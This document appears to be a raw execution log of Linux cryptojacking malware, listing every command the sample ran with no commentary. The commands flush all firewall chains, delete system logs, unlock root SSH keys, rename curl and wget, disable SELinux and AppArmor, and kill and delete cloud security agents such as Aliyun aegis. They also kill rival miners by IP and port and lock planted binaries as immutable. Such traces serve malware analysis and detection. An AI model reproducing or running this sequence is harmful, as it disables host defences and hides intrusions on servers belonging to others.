/sbin/iptables

[iptables -F ufw-before-forward]

/sbin/iptables

[iptables -F ufw-before-logging-forward]

/sbin/iptables

[iptables -F ufw-track-forward]

/sbin/iptables

[iptables -F ufw-track-output]

/sbin/iptables

[iptables -F ufw-track-input]

/sbin/iptables

[iptables -F ufw-skip-to-policy-output]

/sbin/iptables

[iptables -F ufw-reject-output]

/sbin/iptables

[iptables -F ufw-after-logging-output]

/sbin/iptables

[iptables -F ufw-after-output]

/sbin/iptables

[iptables -F ufw-user-logging-output]

/sbin/iptables

[iptables -F ufw-user-output]

/sbin/iptables

[iptables -F ufw-before-output]

/sbin/iptables

[iptables -F ufw-before-logging-output]

/sbin/iptables

[iptables -Z ufw-logging-deny]

/sbin/iptables

[iptables -Z ufw-logging-allow]

/sbin/iptables

[iptables -Z ufw-not-local]

/sbin/iptables

[iptables -Z ufw-user-logging-input]

/sbin/iptables

[iptables -Z ufw-user-limit-accept]

/sbin/iptables

[iptables -Z ufw-user-limit]

/sbin/iptables

[iptables -Z ufw-skip-to-policy-input]

/sbin/iptables

[iptables -Z ufw-reject-input]

/sbin/iptables

[iptables -Z ufw-after-logging-input]

/sbin/iptables

[iptables -Z ufw-after-input]

/sbin/iptables

[iptables -Z ufw-user-input]

/sbin/iptables

[iptables -Z ufw-before-input]

/sbin/iptables

[iptables -Z ufw-before-logging-input]

/sbin/iptables

[iptables -Z ufw-skip-to-policy-forward]

/sbin/iptables

[iptables -Z ufw-reject-forward]

/sbin/iptables

[iptables -Z ufw-after-logging-forward]

/sbin/iptables

[iptables -Z ufw-after-forward]

/sbin/iptables

[iptables -Z ufw-user-logging-forward]

/sbin/iptables

[iptables -Z ufw-user-forward]

/sbin/iptables

[iptables -Z ufw-before-forward]

/sbin/iptables

[iptables -Z ufw-before-logging-forward]

/sbin/iptables

[iptables -Z ufw-track-forward]

/sbin/iptables

[iptables -Z ufw-track-output]

/sbin/iptables

[iptables -Z ufw-track-input]

/sbin/iptables

[iptables -Z ufw-skip-to-policy-output]

/sbin/iptables

[iptables -Z ufw-reject-output]

/sbin/iptables

[iptables -Z ufw-after-logging-output]

/sbin/iptables

[iptables -Z ufw-after-output]

/sbin/iptables

[iptables -Z ufw-user-logging-output]

/sbin/iptables

[iptables -Z ufw-user-output]

/sbin/iptables

[iptables -Z ufw-before-output]

/sbin/iptables

[iptables -Z ufw-before-logging-output]

/sbin/iptables

[iptables -X ufw-logging-deny]

/sbin/iptables

[iptables -X ufw-logging-allow]

/sbin/iptables

[iptables -X ufw-not-local]

/sbin/iptables

[iptables -X ufw-user-logging-input]

/sbin/iptables

[iptables -X ufw-user-logging-output]

/sbin/iptables

[iptables -X ufw-user-logging-forward]

/sbin/iptables

[iptables -X ufw-user-limit-accept]

/sbin/iptables

[iptables -X ufw-user-limit]

/sbin/iptables

[iptables -X ufw-user-input]

/sbin/iptables

[iptables -X ufw-user-forward]

/sbin/iptables

[iptables -X ufw-user-output]

/sbin/iptables

[iptables -X ufw-skip-to-policy-input]

/sbin/iptables

[iptables -X ufw-skip-to-policy-output]

/sbin/iptables

[iptables -X ufw-skip-to-policy-forward]

/sbin/iptables

[iptables -P INPUT ACCEPT]

/sbin/iptables

[iptables -P OUTPUT ACCEPT]

/sbin/iptables

[iptables -P FORWARD ACCEPT]

/sbin/ip6tables

[ip6tables -F ufw6-logging-deny]

/sbin/ip6tables

[ip6tables -F ufw6-logging-allow]

/sbin/ip6tables

[ip6tables -F ufw6-not-local]

/sbin/ip6tables

[ip6tables -F ufw6-user-logging-input]

/sbin/ip6tables

[ip6tables -F ufw6-user-limit-accept]

/sbin/ip6tables

[ip6tables -F ufw6-user-limit]

/sbin/ip6tables

[ip6tables -F ufw6-skip-to-policy-input]

/sbin/ip6tables

[ip6tables -F ufw6-reject-input]

/sbin/ip6tables

[ip6tables -F ufw6-after-logging-input]

/sbin/ip6tables

[ip6tables -F ufw6-after-input]

/sbin/ip6tables

[ip6tables -F ufw6-user-input]

/sbin/ip6tables

[ip6tables -F ufw6-before-input]

/sbin/ip6tables

[ip6tables -F ufw6-before-logging-input]

/sbin/ip6tables

[ip6tables -F ufw6-skip-to-policy-forward]

/sbin/ip6tables

[ip6tables -F ufw6-reject-forward]

/sbin/ip6tables

[ip6tables -F ufw6-after-logging-forward]

/sbin/ip6tables

[ip6tables -F ufw6-after-forward]

/sbin/ip6tables

[ip6tables -F ufw6-user-logging-forward]

/sbin/ip6tables

[ip6tables -F ufw6-user-forward]

/sbin/ip6tables

[ip6tables -F ufw6-before-forward]

/sbin/ip6tables

[ip6tables -F ufw6-before-logging-forward]

/sbin/ip6tables

[ip6tables -F ufw6-track-forward]

/sbin/ip6tables

[ip6tables -F ufw6-track-output]

/sbin/ip6tables

[ip6tables -F ufw6-track-input]

/sbin/ip6tables

[ip6tables -F ufw6-skip-to-policy-output]

/sbin/ip6tables

[ip6tables -F ufw6-reject-output]

/sbin/ip6tables

[ip6tables -F ufw6-after-logging-output]

/sbin/ip6tables

[ip6tables -F ufw6-after-output]

/sbin/ip6tables

[ip6tables -F ufw6-user-logging-output]

/sbin/ip6tables

[ip6tables -F ufw6-user-output]

/sbin/ip6tables

[ip6tables -F ufw6-before-output]

/sbin/ip6tables

[ip6tables -F ufw6-before-logging-output]

/sbin/ip6tables

[ip6tables -Z ufw6-logging-deny]

/sbin/ip6tables

[ip6tables -Z ufw6-logging-allow]

/sbin/ip6tables

[ip6tables -Z ufw6-not-local]

/sbin/ip6tables

[ip6tables -Z ufw6-user-logging-input]

/sbin/ip6tables

[ip6tables -Z ufw6-user-limit-accept]

/sbin/ip6tables

[ip6tables -Z ufw6-user-limit]

/sbin/ip6tables

[ip6tables -Z ufw6-skip-to-policy-input]

/sbin/ip6tables

[ip6tables -Z ufw6-reject-input]

/sbin/ip6tables

[ip6tables -Z ufw6-after-logging-input]

/sbin/ip6tables

[ip6tables -Z ufw6-after-input]

/sbin/ip6tables

[ip6tables -Z ufw6-user-input]

/sbin/ip6tables

[ip6tables -Z ufw6-before-input]

/sbin/ip6tables

[ip6tables -Z ufw6-before-logging-input]

/sbin/ip6tables

[ip6tables -Z ufw6-skip-to-policy-forward]

/sbin/ip6tables

[ip6tables -Z ufw6-reject-forward]

/sbin/ip6tables

[ip6tables -Z ufw6-after-logging-forward]

/sbin/ip6tables

[ip6tables -Z ufw6-after-forward]

/sbin/ip6tables

[ip6tables -Z ufw6-user-logging-forward]

/sbin/ip6tables

[ip6tables -Z ufw6-user-forward]

/sbin/ip6tables

[ip6tables -Z ufw6-before-forward]

/sbin/ip6tables

[ip6tables -Z ufw6-before-logging-forward]

/sbin/ip6tables

[ip6tables -Z ufw6-track-forward]

/sbin/ip6tables

[ip6tables -Z ufw6-track-output]

/sbin/ip6tables

[ip6tables -Z ufw6-track-input]

/sbin/ip6tables

[ip6tables -Z ufw6-skip-to-policy-output]

/sbin/ip6tables

[ip6tables -Z ufw6-reject-output]

/sbin/ip6tables

[ip6tables -Z ufw6-after-logging-output]

/sbin/ip6tables

[ip6tables -Z ufw6-after-output]

/sbin/ip6tables

[ip6tables -Z ufw6-user-logging-output]

/sbin/ip6tables

[ip6tables -Z ufw6-user-output]

/sbin/ip6tables

[ip6tables -Z ufw6-before-output]

/sbin/ip6tables

[ip6tables -Z ufw6-before-logging-output]

/sbin/ip6tables

[ip6tables -X ufw6-logging-deny]

/sbin/ip6tables

[ip6tables -X ufw6-logging-allow]

/sbin/ip6tables

[ip6tables -X ufw6-not-local]

/sbin/ip6tables

[ip6tables -X ufw6-user-logging-input]

/sbin/ip6tables

[ip6tables -X ufw6-user-logging-output]

/sbin/ip6tables

[ip6tables -X ufw6-user-logging-forward]

/sbin/ip6tables

[ip6tables -X ufw6-user-limit-accept]

/sbin/ip6tables

[ip6tables -X ufw6-user-limit]

/sbin/ip6tables

[ip6tables -X ufw6-user-input]

/sbin/ip6tables

[ip6tables -X ufw6-user-forward]

/sbin/ip6tables

[ip6tables -X ufw6-user-output]

/sbin/ip6tables

[ip6tables -X ufw6-skip-to-policy-input]

/sbin/ip6tables

[ip6tables -X ufw6-skip-to-policy-output]

/sbin/ip6tables

[ip6tables -X ufw6-skip-to-policy-forward]

/sbin/ip6tables

[ip6tables -P INPUT ACCEPT]

/sbin/ip6tables

[ip6tables -P OUTPUT ACCEPT]

/sbin/ip6tables

[ip6tables -P FORWARD ACCEPT]

/usr/bin/chattr

[chattr -iae /root/.ssh/]

/usr/bin/chattr

[chattr -iae /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr -iua /tmp/]

/usr/bin/chattr

[chattr -iua /var/tmp/]

/bin/rm

[rm -rf /tmp/addres*]

/bin/rm

[rm -rf /tmp/walle*]

/bin/rm

[rm -rf /tmp/keys]

/bin/rm

[rm -rf /var/log/syslog]

/bin/sync

[sync]

/bin/cat

[cat /var/spool/cron/]

/bin/cat

[cat /root/.ssh/authorized_keys]

/bin/mv

[mv /usr/bin/wgettnt /usr/bin/wd1]

/bin/mv

[mv /usr/bin/curltnt /usr/bin/cd1]

/bin/mv

[mv /usr/bin/wget1 /usr/bin/wd1]

/bin/mv

[mv /usr/bin/curl1 /usr/bin/cd1]

/bin/mv

[mv /usr/bin/cur /usr/bin/cd1]

/bin/mv

[mv /usr/bin/cdl /usr/bin/cd1]

/bin/mv

[mv /usr/bin/cdt /usr/bin/cd1]

/bin/mv

[mv /usr/bin/xget /usr/bin/wd1]

/bin/mv

[mv /usr/bin/wge /usr/bin/wd1]

/bin/mv

[mv /usr/bin/wdl /usr/bin/wd1]

/bin/mv

[mv /usr/bin/wdt /usr/bin/wd1]

/bin/mv

[mv /usr/bin/wget /usr/bin/wd1]

/bin/mv

[mv /usr/bin/curl /usr/bin/cd1]

/bin/grep

[grep -i [a]liyun]

/bin/ps

[ps aux]

/bin/grep

[grep -i [y]unjing]

/bin/ps

[ps aux]

/usr/sbin/setenforce

[setenforce 0]

/usr/sbin/service

[service apparmor stop]

/usr/bin/basename

[basename /usr/sbin/service]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/systemctl

[systemctl --quiet is-active multi-user.target]

/bin/sed

[sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]

/bin/systemctl

[systemctl list-unit-files --full --type=socket]

/usr/local/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop apparmor.service]

/usr/local/bin/systemctl

[systemctl --job-mode=ignore-dependencies stop apparmor.service]

/usr/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop apparmor.service]

/usr/bin/systemctl

[systemctl --job-mode=ignore-dependencies stop apparmor.service]

/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop apparmor.service]

/bin/systemctl

[systemctl --job-mode=ignore-dependencies stop apparmor.service]

/bin/systemctl

[systemctl disable apparmor]

/lib/systemd/systemd-sysv-install

[/lib/systemd/systemd-sysv-install disable apparmor]

/usr/bin/getopt

[getopt -o r: --long root: -- disable apparmor]

/usr/sbin/update-rc.d

[/usr/sbin/update-rc.d apparmor defaults]

/usr/local/sbin/systemctl

[systemctl daemon-reload]

/usr/local/bin/systemctl

[systemctl daemon-reload]

/usr/sbin/systemctl

[systemctl daemon-reload]

/usr/bin/systemctl

[systemctl daemon-reload]

/sbin/systemctl

[systemctl daemon-reload]

/bin/systemctl

[systemctl daemon-reload]

/usr/sbin/update-rc.d

[/usr/sbin/update-rc.d apparmor disable]

/usr/local/sbin/systemctl

[systemctl daemon-reload]

/usr/local/bin/systemctl

[systemctl daemon-reload]

/usr/sbin/systemctl

[systemctl daemon-reload]

/usr/bin/systemctl

[systemctl daemon-reload]

/sbin/systemctl

[systemctl daemon-reload]

/bin/systemctl

[systemctl daemon-reload]

/usr/sbin/service

[service aliyun.service stop]

/usr/bin/basename

[basename /usr/sbin/service]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/systemctl

[systemctl --quiet is-active multi-user.target]

/bin/sed

[sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]

/bin/systemctl

[systemctl list-unit-files --full --type=socket]

/usr/local/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop aliyun.service.service]

/usr/local/bin/systemctl

[systemctl --job-mode=ignore-dependencies stop aliyun.service.service]

/usr/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop aliyun.service.service]

/usr/bin/systemctl

[systemctl --job-mode=ignore-dependencies stop aliyun.service.service]

/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop aliyun.service.service]

/bin/systemctl

[systemctl --job-mode=ignore-dependencies stop aliyun.service.service]

/bin/systemctl

[systemctl disable aliyun.service]

/bin/grep

[grep aegis]

/bin/grep

[grep -v grep]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep Yun]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs rm -rf]

/usr/bin/xargs

[xargs dirname]

/usr/bin/awk

[awk {print $11}]

/bin/grep

[grep aegis]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/local/sbin/dirname

[dirname]

/usr/local/bin/dirname

[dirname]

/usr/sbin/dirname

[dirname]

/usr/bin/dirname

[dirname]

/usr/local/sbin/rm

[rm -rf]

/usr/local/bin/rm

[rm -rf]

/usr/sbin/rm

[rm -rf]

/usr/bin/rm

[rm -rf]

/sbin/rm

[rm -rf]

/bin/rm

[rm -rf]

/usr/bin/xargs

[xargs rm -rf]

/usr/bin/xargs

[xargs dirname]

/usr/bin/awk

[awk {print $11}]

/bin/grep

[grep hids]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/local/sbin/dirname

[dirname]

/usr/local/bin/dirname

[dirname]

/usr/sbin/dirname

[dirname]

/usr/bin/dirname

[dirname]

/usr/local/sbin/rm

[rm -rf]

/usr/local/bin/rm

[rm -rf]

/usr/sbin/rm

[rm -rf]

/usr/bin/rm

[rm -rf]

/sbin/rm

[rm -rf]

/bin/rm

[rm -rf]

/usr/bin/xargs

[xargs rm -rf]

/usr/bin/xargs

[xargs dirname]

/usr/bin/awk

[awk {print $11}]

/bin/grep

[grep cloudwalker]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/local/sbin/dirname

[dirname]

/usr/local/bin/dirname

[dirname]

/usr/sbin/dirname

[dirname]

/usr/bin/dirname

[dirname]

/usr/local/sbin/rm

[rm -rf]

/usr/local/bin/rm

[rm -rf]

/usr/sbin/rm

[rm -rf]

/usr/bin/rm

[rm -rf]

/sbin/rm

[rm -rf]

/bin/rm

[rm -rf]

/usr/bin/xargs

[xargs rm -rf]

/usr/bin/xargs

[xargs dirname]

/usr/bin/awk

[awk {print $11}]

/bin/grep

[grep titanagent]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/local/sbin/dirname

[dirname]

/usr/local/bin/dirname

[dirname]

/usr/sbin/dirname

[dirname]

/usr/bin/dirname

[dirname]

/usr/local/sbin/rm

[rm -rf]

/usr/local/bin/rm

[rm -rf]

/usr/sbin/rm

[rm -rf]

/usr/bin/rm

[rm -rf]

/sbin/rm

[rm -rf]

/bin/rm

[rm -rf]

/usr/bin/xargs

[xargs -I {} kill -9 {}]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep edr]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I {} kill -9 {}]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep aegis]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I {} kill -9 {}]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep Yun]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I {} kill -9 {}]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep hids]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I {} kill -9 {}]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep edr]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I {} kill -9 {}]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep cloudwalker]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I {} kill -9 {}]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep titanagent]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I {} kill -9 {}]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep sgagent]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I {} kill -9 {}]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep barad_agent]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I {} kill -9 {}]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep hostguard]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/bin/rm

[rm -rf /usr/local/aegis]

/bin/sleep

[sleep 1]

/usr/bin/chattr

[chattr -i /usr/bin/ip6network]

/usr/bin/chattr

[chattr -i /usr/bin/kswaped]

/usr/bin/chattr

[chattr -i /usr/bin/irqbalanced]

/usr/bin/chattr

[chattr -i /usr/bin/rctlcli]

/usr/bin/chattr

[chattr -i /usr/bin/systemd-network]

/usr/bin/chattr

[chattr -i /usr/bin/pamdicks]

/usr/bin/chattr

[chattr +i /usr/bin/ip6network]

/usr/bin/chattr

[chattr +i /usr/bin/kswaped]

/usr/bin/chattr

[chattr +i /usr/bin/irqbalanced]

/usr/bin/chattr

[chattr +i /usr/bin/rctlcli]

/usr/bin/chattr

[chattr +i /usr/bin/systemd-network]

/usr/bin/chattr

[chattr +i /usr/bin/pamdicks]

/bin/sleep

[sleep 1]

/bin/rm

[rm -f /tmp/.null]

/sbin/sysctl

[sysctl -w vm.nr_hugepages=128]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep 194.87.139.103]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep 185.71.65.238]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep 140.82.52.87]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep -v -]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep :23]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep -v -]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep :143]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep -v -]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep :2222]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep -v -]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep :3333]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep -v -]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep :3389]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep -v -]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep :5555]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep -v -]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep :6666]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep -v -]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep :6665]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep -v -]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep :6667]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep -v -]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep :7777]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep -v -]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep :8444]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep -v -]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep :3347]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep -v -]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep :10008]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep :13531]

/bin/grep

[grep -v grep]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep :3333]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep :5555]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep kworker -c\]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep log_]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep systemten]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep netns]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/local/sbin/kill

[kill -9 14]

/usr/local/bin/kill

[kill -9 14]

/usr/sbin/kill

[kill -9 14]

/usr/bin/kill

[kill -9 14]

/sbin/kill

[kill -9 14]

/bin/kill

[kill -9 14]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep voltuned]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep darwin]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep /tmp/dl]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep /tmp/ddg]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep /tmp/pprt]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep /tmp/ppol]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep /tmp/65ccE*]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep /tmp/jmx*]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep /tmp/2Ne80*]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep IOFoqIgyC0zmf2UR]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 45.76.122.92]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 51.38.191.178]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 51.15.56.161]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 86s.jpg]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep aGTSGJJp]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep nMrfmnRa]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep PuNY5tm2]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep I0r8Jyyt]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep AgdgACUD]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep uiZvwxG8]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep hahwNEdB]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep BtwXn5qH]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 3XEzey2T]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep t2tKrCSZ]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep HD7fcBgg]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep zXcDajSs]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 3lmigMo]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep AkMK4A2]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep AJ2AkKe]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep HiPxCJRS]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep http_0xCC030]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep http_0xCC031]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep http_0xCC032]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep http_0xCC033]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep C4iLM4L]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep aziplcr72qjhzvin]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk { if(substr($11,1,2)=="./" && substr($12,1,2)=="./") print $2 }]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

